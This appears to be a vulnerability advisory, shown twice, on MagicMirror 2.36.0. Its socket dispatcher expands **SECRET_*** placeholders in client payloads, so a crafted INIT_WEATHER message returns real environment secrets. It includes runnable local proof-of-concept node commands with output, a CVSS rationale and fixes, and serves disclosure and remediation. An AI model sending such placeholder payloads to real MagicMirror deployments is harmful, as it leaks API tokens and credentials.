Summary
When hideConfigSecrets: true is enabled, MagicMirror redacts SECRET_* environment placeholders in the HTTP /config response, but the shared node-helper socket dispatcher expands **SECRET_NAME** placeholders in every inbound socket payload before passing it to module helpers. Any client that can connect to a loaded module namespace can send a placeholder such as **SECRET_API_KEY** and cause the server to substitute the real environment variable into the helper payload. Helpers that echo attacker-controlled payload fields, such as the default weather helper error path, can return the secret value to the socket client.
Details
The affected product is the npm package/application magicmirror at version 2.36.0, tested at commit fb41d24ef522e91e802e2a623ff6afbddeb3c9d8 from https://github.com/MagicMirrorOrg/MagicMirror.git.
The secret-redaction feature is implemented during config loading:
js/utils.js:117-123 loads a config.env file next to the config file into process.env when present.
js/utils.js:130-151 creates both a full config and a redacted config.
js/utils.js:137-140 redacts environment variables whose names start with SECRET_ to **SECRET_NAME** in the redacted config when hideConfigSecrets: true is present.
js/server.js:112-125 returns either configObj.redactedConf or configObj.fullConf from /config depending on config.hideConfigSecrets.
The disclosure root cause is the inbound socket dispatcher:
js/node_helper.js:88-103 registers a catch-all handler for each module namespace.
js/node_helper.js:91-99 checks config?.hideConfigSecrets and, for every inbound object payload, runs replaceSecretPlaceholder(JSON.stringify(payload)) before invoking socketNotificationReceived(...).
js/server_functions.js:23-34 implements replaceSecretPlaceholder(...) by replacing **SECRET_* **-style placeholders with process.env[...], unless global.config.cors === "allowAll".
This reverses the redaction boundary: redacted placeholders intended for the browser can be sent back to the server and expanded into real environment secret values inside helper payloads.
A confirmed echo path exists in the default weather helper:
defaultmodules/weather/node_helper.js:12-19 accepts INIT_WEATHER from the socket.
defaultmodules/weather/node_helper.js:27-31 copies config.instanceId from the attacker-controlled payload.
defaultmodules/weather/node_helper.js:47-52 attempts to dynamically load the requested weather provider.
defaultmodules/weather/node_helper.js:86-91 catches errors and sends WEATHER_ERROR with the same instanceId back to the namespace.
False-positive screening performed:
- This is not a generic environment leak through
/env; js/server_functions.js:221-240 returns only selected client environment paths.
- The HTTP
/config route does redact placeholders when hideConfigSecrets: true; the issue is that the inbound socket path expands those placeholders again before module helper code runs.
replaceSecretPlaceholder(...) intentionally refuses substitution when global.config.cors === "allowAll" (js/server_functions.js:29-34); the positive PoC used cors: "disabled", which is the shipped default (js/defaults.js:14). A negative control with no substitution produced the placeholder unchanged.
- The attacker must know or infer a
SECRET_* variable name. If the attacker can read the redacted /config response, placeholder names may be disclosed even when values are hidden. The PoC uses a known SECRET_MM_AUDIT test variable.
- Network reachability follows the Socket.IO exposure model. With the shipped default
address: "localhost" and loopback ipWhitelist, remote network reachability is limited. In documented non-loopback deployments, this combines with the Socket.IO access-control gap described separately.
Affected-version evidence: only magicmirror@2.36.0 at commit fb41d24ef522e91e802e2a623ff6afbddeb3c9d8 was tested. The affected range is unknown from this audit; earlier versions were not tested. No patched version or fix commit was identified locally.
PoC
The following safe local PoC was run from a clean checkout of MagicMirror at commit fb41d24ef522e91e802e2a623ff6afbddeb3c9d8. Because node_modules were not installed in this audit environment and package.json:52 has a destructive postinstall, the command uses dependency stubs while executing the vulnerable repository dispatcher and weather helper code. It writes no files and does not contact external services.
Positive trigger:
node -e 'const Module=require("module"); const orig=Module._load; Module._load=(r,p,m)=>{ if(r==="express") return { static:()=>()=>{} }; if(r==="logger") return {log(){},error(){},warn(){},info(){},debug(){}}; if(r==="#server_functions") return {replaceSecretPlaceholder:(input)=>input.replaceAll(/\*\*(SECRET_[^*]+)\*\*/g,(_m,g)=>process.env[g])}; return orig(r,p,m); }; require("./js/alias-resolver"); global.root_path=process.cwd(); global.config={hideConfigSecrets:true,cors:"disabled"}; process.env.SECRET_MM_AUDIT="secret-marker-42"; const Weather=require("./defaultmodules/weather/node_helper"); const helper=new Weather(); helper.setName("weather"); const sent=[]; helper.sendSocketNotification=(n,p)=>sent.push({n,p}); let onAny; const fakeIo={of(){return {on(_ev,cb){const socket={onAny(fn){onAny=fn;}}; cb(socket);}};}}; helper.setSocketIO(fakeIo); Promise.resolve(onAny("INIT_WEATHER",{instanceId:"**SECRET_MM_AUDIT**",weatherProvider:"definitely-not-a-provider",type:"current"})).then(()=>setTimeout(()=>{console.log(JSON.stringify(sent));},10));'
Observed output:
[{"n":"WEATHER_ERROR","p":{"instanceId":"secret-marker-42","error":"Cannot find module '/home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/providers/definitely-not-a-provider.js'\nRequire stack:\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/node_helper.js\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/[eval]"}}]
Expected vulnerable output: the weather error payload returned by the helper contains "instanceId":"secret-marker-42", proving the server substituted the SECRET_MM_AUDIT environment variable into an attacker-controlled socket payload and returned it to the client.
Negative/control trigger simulating no inbound placeholder substitution:
node -e 'const Module=require("module"); const orig=Module._load; Module._load=(r,p,m)=>{ if(r==="express") return { static:()=>()=>{} }; if(r==="logger") return {log(){},error(){},warn(){},info(){},debug(){}}; if(r==="#server_functions") return {replaceSecretPlaceholder:(input)=>input}; return orig(r,p,m); }; require("./js/alias-resolver"); global.root_path=process.cwd(); global.config={hideConfigSecrets:true,cors:"allowAll"}; process.env.SECRET_MM_AUDIT="secret-marker-42"; const Weather=require("./defaultmodules/weather/node_helper"); const helper=new Weather(); helper.setName("weather"); const sent=[]; helper.sendSocketNotification=(n,p)=>sent.push({n,p}); let onAny; const fakeIo={of(){return {on(_ev,cb){const socket={onAny(fn){onAny=fn;}}; cb(socket);}};}}; helper.setSocketIO(fakeIo); Promise.resolve(onAny("INIT_WEATHER",{instanceId:"**SECRET_MM_AUDIT**",weatherProvider:"definitely-not-a-provider",type:"current"})).then(()=>setTimeout(()=>{console.log(JSON.stringify(sent));},10));'
Observed control output:
[{"n":"WEATHER_ERROR","p":{"instanceId":"**SECRET_MM_AUDIT**","error":"Cannot find module '/home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/providers/definitely-not-a-provider.js'\nRequire stack:\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/node_helper.js\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/[eval]"}}]
Expected control output: the placeholder remains **SECRET_MM_AUDIT**, showing that the positive case depends on the vulnerable server-side placeholder expansion step.
Final repro re-check: both the positive and negative harnesses were re-run after drafting, and the observed outputs above are from this environment. No cleanup was required.
Impact
Any client that can connect to a module Socket.IO namespace can disclose SECRET_* environment variables by sending known placeholder names in object payloads that are expanded by js/node_helper.js before helper processing. This undermines the purpose of hideConfigSecrets: true: secrets are hidden in the HTTP config response but can be converted back into their real values through inbound socket payloads.
The confidentiality impact depends on what the deployment stores under SECRET_* variables. MagicMirror configurations commonly include API tokens, calendar credentials, service keys, or network allowlist values in config/environment variables. The PoC proves disclosure of a test secret through a default helper echo path.
CVSS 3.1 rationale: AV:A because MagicMirror is intended for trusted local/private networks and remote exploitation requires a reachable local/private-network deployment; AC:L because once namespace access is available the attacker only needs a known or guessed SECRET_* name and an invalid weather provider to trigger the echo; PR:N because no application authentication is required; UI:N because the attacker sends socket messages directly; S:U because the impact is disclosure of secrets from the vulnerable application's own process environment; C:H because environment secrets can include credentials/API tokens; I:N/A:N because this report proves disclosure only.
Suggested remediation
Do not expand SECRET_* placeholders in inbound socket payloads. The redaction boundary should be one-way: server-to-client responses may contain placeholders, but client-to-server messages must not be treated as authority to retrieve real environment values.
Concrete fixes:
- Remove the
replaceSecretPlaceholder(JSON.stringify(payload)) call from js/node_helper.js:91-99 for inbound socket payloads.
- If a specific module legitimately needs secret material, resolve it only from server-loaded trusted configuration, not from client-supplied placeholders.
- Keep
hideConfigSecrets redaction for /config, but avoid disclosing placeholder names to clients when not necessary.
- Add regression tests that set
hideConfigSecrets: true and SECRET_TEST=value, send a socket payload containing **SECRET_TEST**, and assert that every helper receives/returns the literal placeholder rather than the secret value.
Summary
When
hideConfigSecrets: trueis enabled, MagicMirror redactsSECRET_*environment placeholders in the HTTP/configresponse, but the shared node-helper socket dispatcher expands**SECRET_NAME**placeholders in every inbound socket payload before passing it to module helpers. Any client that can connect to a loaded module namespace can send a placeholder such as**SECRET_API_KEY**and cause the server to substitute the real environment variable into the helper payload. Helpers that echo attacker-controlled payload fields, such as the default weather helper error path, can return the secret value to the socket client.Details
The affected product is the npm package/application
magicmirrorat version2.36.0, tested at commitfb41d24ef522e91e802e2a623ff6afbddeb3c9d8fromhttps://github.com/MagicMirrorOrg/MagicMirror.git.The secret-redaction feature is implemented during config loading:
js/utils.js:117-123loads aconfig.envfile next to the config file intoprocess.envwhen present.js/utils.js:130-151creates both a full config and a redacted config.js/utils.js:137-140redacts environment variables whose names start withSECRET_to**SECRET_NAME**in the redacted config whenhideConfigSecrets: trueis present.js/server.js:112-125returns eitherconfigObj.redactedConforconfigObj.fullConffrom/configdepending onconfig.hideConfigSecrets.The disclosure root cause is the inbound socket dispatcher:
js/node_helper.js:88-103registers a catch-all handler for each module namespace.js/node_helper.js:91-99checksconfig?.hideConfigSecretsand, for every inbound object payload, runsreplaceSecretPlaceholder(JSON.stringify(payload))before invokingsocketNotificationReceived(...).js/server_functions.js:23-34implementsreplaceSecretPlaceholder(...)by replacing**SECRET_* **-style placeholders withprocess.env[...], unlessglobal.config.cors === "allowAll".This reverses the redaction boundary: redacted placeholders intended for the browser can be sent back to the server and expanded into real environment secret values inside helper payloads.
A confirmed echo path exists in the default weather helper:
defaultmodules/weather/node_helper.js:12-19acceptsINIT_WEATHERfrom the socket.defaultmodules/weather/node_helper.js:27-31copiesconfig.instanceIdfrom the attacker-controlled payload.defaultmodules/weather/node_helper.js:47-52attempts to dynamically load the requested weather provider.defaultmodules/weather/node_helper.js:86-91catches errors and sendsWEATHER_ERRORwith the sameinstanceIdback to the namespace.False-positive screening performed:
/env;js/server_functions.js:221-240returns only selected client environment paths./configroute does redact placeholders whenhideConfigSecrets: true; the issue is that the inbound socket path expands those placeholders again before module helper code runs.replaceSecretPlaceholder(...)intentionally refuses substitution whenglobal.config.cors === "allowAll"(js/server_functions.js:29-34); the positive PoC usedcors: "disabled", which is the shipped default (js/defaults.js:14). A negative control with no substitution produced the placeholder unchanged.SECRET_*variable name. If the attacker can read the redacted/configresponse, placeholder names may be disclosed even when values are hidden. The PoC uses a knownSECRET_MM_AUDITtest variable.address: "localhost"and loopbackipWhitelist, remote network reachability is limited. In documented non-loopback deployments, this combines with the Socket.IO access-control gap described separately.Affected-version evidence: only
magicmirror@2.36.0at commitfb41d24ef522e91e802e2a623ff6afbddeb3c9d8was tested. The affected range is unknown from this audit; earlier versions were not tested. No patched version or fix commit was identified locally.PoC
The following safe local PoC was run from a clean checkout of MagicMirror at commit
fb41d24ef522e91e802e2a623ff6afbddeb3c9d8. Becausenode_moduleswere not installed in this audit environment andpackage.json:52has a destructivepostinstall, the command uses dependency stubs while executing the vulnerable repository dispatcher and weather helper code. It writes no files and does not contact external services.Positive trigger:
node -e 'const Module=require("module"); const orig=Module._load; Module._load=(r,p,m)=>{ if(r==="express") return { static:()=>()=>{} }; if(r==="logger") return {log(){},error(){},warn(){},info(){},debug(){}}; if(r==="#server_functions") return {replaceSecretPlaceholder:(input)=>input.replaceAll(/\*\*(SECRET_[^*]+)\*\*/g,(_m,g)=>process.env[g])}; return orig(r,p,m); }; require("./js/alias-resolver"); global.root_path=process.cwd(); global.config={hideConfigSecrets:true,cors:"disabled"}; process.env.SECRET_MM_AUDIT="secret-marker-42"; const Weather=require("./defaultmodules/weather/node_helper"); const helper=new Weather(); helper.setName("weather"); const sent=[]; helper.sendSocketNotification=(n,p)=>sent.push({n,p}); let onAny; const fakeIo={of(){return {on(_ev,cb){const socket={onAny(fn){onAny=fn;}}; cb(socket);}};}}; helper.setSocketIO(fakeIo); Promise.resolve(onAny("INIT_WEATHER",{instanceId:"**SECRET_MM_AUDIT**",weatherProvider:"definitely-not-a-provider",type:"current"})).then(()=>setTimeout(()=>{console.log(JSON.stringify(sent));},10));'Observed output:
[{"n":"WEATHER_ERROR","p":{"instanceId":"secret-marker-42","error":"Cannot find module '/home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/providers/definitely-not-a-provider.js'\nRequire stack:\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/node_helper.js\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/[eval]"}}]Expected vulnerable output: the weather error payload returned by the helper contains
"instanceId":"secret-marker-42", proving the server substituted theSECRET_MM_AUDITenvironment variable into an attacker-controlled socket payload and returned it to the client.Negative/control trigger simulating no inbound placeholder substitution:
node -e 'const Module=require("module"); const orig=Module._load; Module._load=(r,p,m)=>{ if(r==="express") return { static:()=>()=>{} }; if(r==="logger") return {log(){},error(){},warn(){},info(){},debug(){}}; if(r==="#server_functions") return {replaceSecretPlaceholder:(input)=>input}; return orig(r,p,m); }; require("./js/alias-resolver"); global.root_path=process.cwd(); global.config={hideConfigSecrets:true,cors:"allowAll"}; process.env.SECRET_MM_AUDIT="secret-marker-42"; const Weather=require("./defaultmodules/weather/node_helper"); const helper=new Weather(); helper.setName("weather"); const sent=[]; helper.sendSocketNotification=(n,p)=>sent.push({n,p}); let onAny; const fakeIo={of(){return {on(_ev,cb){const socket={onAny(fn){onAny=fn;}}; cb(socket);}};}}; helper.setSocketIO(fakeIo); Promise.resolve(onAny("INIT_WEATHER",{instanceId:"**SECRET_MM_AUDIT**",weatherProvider:"definitely-not-a-provider",type:"current"})).then(()=>setTimeout(()=>{console.log(JSON.stringify(sent));},10));'Observed control output:
[{"n":"WEATHER_ERROR","p":{"instanceId":"**SECRET_MM_AUDIT**","error":"Cannot find module '/home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/providers/definitely-not-a-provider.js'\nRequire stack:\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/defaultmodules/weather/node_helper.js\n- /home/sondt23/Github/Research/CVE/auto-github-cve/github-repo/MagicMirror/[eval]"}}]Expected control output: the placeholder remains
**SECRET_MM_AUDIT**, showing that the positive case depends on the vulnerable server-side placeholder expansion step.Final repro re-check: both the positive and negative harnesses were re-run after drafting, and the observed outputs above are from this environment. No cleanup was required.
Impact
Any client that can connect to a module Socket.IO namespace can disclose
SECRET_*environment variables by sending known placeholder names in object payloads that are expanded byjs/node_helper.jsbefore helper processing. This undermines the purpose ofhideConfigSecrets: true: secrets are hidden in the HTTP config response but can be converted back into their real values through inbound socket payloads.The confidentiality impact depends on what the deployment stores under
SECRET_*variables. MagicMirror configurations commonly include API tokens, calendar credentials, service keys, or network allowlist values in config/environment variables. The PoC proves disclosure of a test secret through a default helper echo path.CVSS 3.1 rationale: AV:A because MagicMirror is intended for trusted local/private networks and remote exploitation requires a reachable local/private-network deployment; AC:L because once namespace access is available the attacker only needs a known or guessed
SECRET_*name and an invalid weather provider to trigger the echo; PR:N because no application authentication is required; UI:N because the attacker sends socket messages directly; S:U because the impact is disclosure of secrets from the vulnerable application's own process environment; C:H because environment secrets can include credentials/API tokens; I:N/A:N because this report proves disclosure only.Suggested remediation
Do not expand
SECRET_*placeholders in inbound socket payloads. The redaction boundary should be one-way: server-to-client responses may contain placeholders, but client-to-server messages must not be treated as authority to retrieve real environment values.Concrete fixes:
replaceSecretPlaceholder(JSON.stringify(payload))call fromjs/node_helper.js:91-99for inbound socket payloads.hideConfigSecretsredaction for/config, but avoid disclosing placeholder names to clients when not necessary.hideConfigSecrets: trueandSECRET_TEST=value, send a socket payload containing**SECRET_TEST**, and assert that every helper receives/returns the literal placeholder rather than the secret value.